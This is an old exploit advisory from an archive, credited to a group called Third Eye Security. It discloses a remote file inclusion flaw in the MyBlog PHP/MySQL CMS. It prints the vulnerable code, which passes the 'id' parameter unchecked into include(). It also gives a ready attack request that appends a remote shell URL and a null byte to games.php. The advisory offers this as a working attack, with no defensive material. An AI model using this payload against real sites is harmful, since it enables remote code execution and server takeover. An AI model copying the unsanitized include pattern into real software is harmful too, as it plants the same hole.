myblogmysql-rfi.txt
Posted on 13 June 2008
[*]================================================================================[*] | _____ _ _ _ _____ | | |_ _| |__ (_)_ __ __| | | ____| _ ___ | | | | | '_ | | '__/ _` | | _|| | | |/ _ | | | | | | | | | | | (_| | | |__| |_| | __/ | | |_| |_| |_|_|_| \__,_| |_____\__, |\___| | | |___/ | | ____ _ _ | | / ___| ___ ___ _ _ _ __(_) |_ _ _ | | \___ / _ / __| | | | '__| | __| | | | | | ___) | __/ (__| |_| | | | | |_| |_| | | | |____/ \___|\___|\__,_|_| |_|\__|\__, | | | |___/ | [*]================================================================================[*] | Author: StAkeR ~ StAkeR@hotmail.it | [*]================================================================================[*] | Third Eye Security Members => Osirys,StAkeR,Over_Flow,Miclen | [*]================================================================================[*] | MyBlog PHP and MySQL Blog/CMS <= Remote File Inclusion Vulnerability | [*]================================================================================[*] | Download: http://surfnet.dl.sourceforge.net/sourceforge/myblog/os.zip | [*]================================================================================[*] | include($_GET['id'] . ".php"); | | games.php?id= [Your Shell] %00 | [*]================================================================================[*]
